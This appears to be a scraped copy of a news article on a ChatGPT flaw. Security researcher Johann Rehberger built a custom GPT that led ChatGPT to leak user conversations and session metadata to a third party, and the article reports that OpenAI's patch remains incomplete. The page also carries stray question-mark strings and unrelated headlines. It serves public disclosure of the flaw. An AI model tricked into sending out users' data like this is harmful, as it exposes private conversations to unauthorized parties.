We've said it before,????? ??? ??????? ???????? ???? ?????and we'll sayit again: Don't input anything into ChatGPT that you don't want unauthorized parties to read.
Since OpenAI released ChatGPT last year, there have been quite a few occasions where flaws in the AI chatbot could've been weaponized or manipulated by bad actors to access sensitive or private data. And this latest example shows that even after a security patch has been released, problems can still persist.
According to a report by Bleeping Computer, OpenAI has recently rolled out a fix for an issue where ChatGPT could leak users' data to unauthorized third parties. This data could include user conversations with ChatGPT and corresponding metadata like a user's ID and session information.
However, according to security researcher Johann Rehberger, who originally discovered the vulnerability and outlined how it worked, there are still gaping security holes in OpenAI's fix. In essence, the security flaw still exists.
Rehberger was able to take advantage of OpenAI's recently released and much-lauded custom GPTsfeature to create his own GPT, which exfiltrated data from ChatGPT. This was a significant finding as custom GPTs are being marketed as AI apps akin to how the iPhone revolutionized mobile applications with the App Store. If Rehberger could create this custom GPT, it seems like bad actors could soon discover the flaw and create custom GPTs to steal data from their targets.
Rehberger says he first contactedOpenAI about the "data exfiltration technique" way back in April. He contacted OpenAI once again in November to report exactly how he was able to create a custom GPT and carry out the process.
On Wednesday, Rehberger posted an updateto his website. OpenAI had patched the leak vulnerability.
"The fix is not perfect, but a step into the right direction," Rehberger explained.
The reason the fix isn't perfect is that ChatGPT is still leaking data through the vulnerability Rehberger discovered. ChatGPT can still be tricked into sending data.
"Some quick tests show that bits of info can steal [sic] leak," Rehberger wrote, further explaining that "it only leaks small amounts this way, is slow and more noticeable to a user." Regardless of the remaining issues, Rehberger said it's a "step in the right direction for sure."
But, the security flaw still remains entirely in the ChatGPT apps for iOS and Android, which have yet to be updated with a fix.
ChatGPT users should remain vigilant when using custom GPTs and should likely pass on these AI apps from unknown third parties.
Topics Artificial Intelligence Cybersecurity ChatGPT OpenAI
Manchester City vs. Plymouth Argyle 2025 livestream: Watch FA Cup for freeNYT Connections Sports Edition hints and answers for February 28: Tips to solve Connections #158OpenAI GPTWhat's new to streaming this week? (Feb. 27, 2025)Best Samsung Galaxy Watch FE deal: Save $30 at Best BuyWhat's new to streaming this week? (Feb. 27, 2025)Best Bose deal: Get $100 off QuietComfort headphonesTikTok's latest trend mocks millennial burger jointsHere's what people across the U.S. saw during the solar eclipseAfghanistan vs. Australia 2025 livestream: Watch ICC Champions Trophy for free Xpeng to contribute to all Volkswagen EVs in China starting 2026 · TechNode OpenAI teams up with Apple's Jony Ive to make AI Best Dyson deal: Get the Dyson Airstrait Straightener for its lowest price yet Huawei and Baidu stockpile Samsung HBM chips as US export restrictions loom: report · TechNode Best Apple deal: Save over $20 on AirTag 4 Tencent announces September launch for Delta Force: Hawk Ops, a tactical first NYT Strands hints, answers for May 22 Meituan set to enter Riyadh as early as September · TechNode China and US tie for top spot in gold medal count at Paris Olympics 2024 · TechNode Trump zeroes out Biden's funding for rural broadband access
0.1474s , 10009.671875 kb
Copyright © 2025 Powered by 【????? ??? ??????? ???????? ???? ?????】OpenAI releases ChatGPT data leak patch, but the issue isn't completely fixed,Feature Flash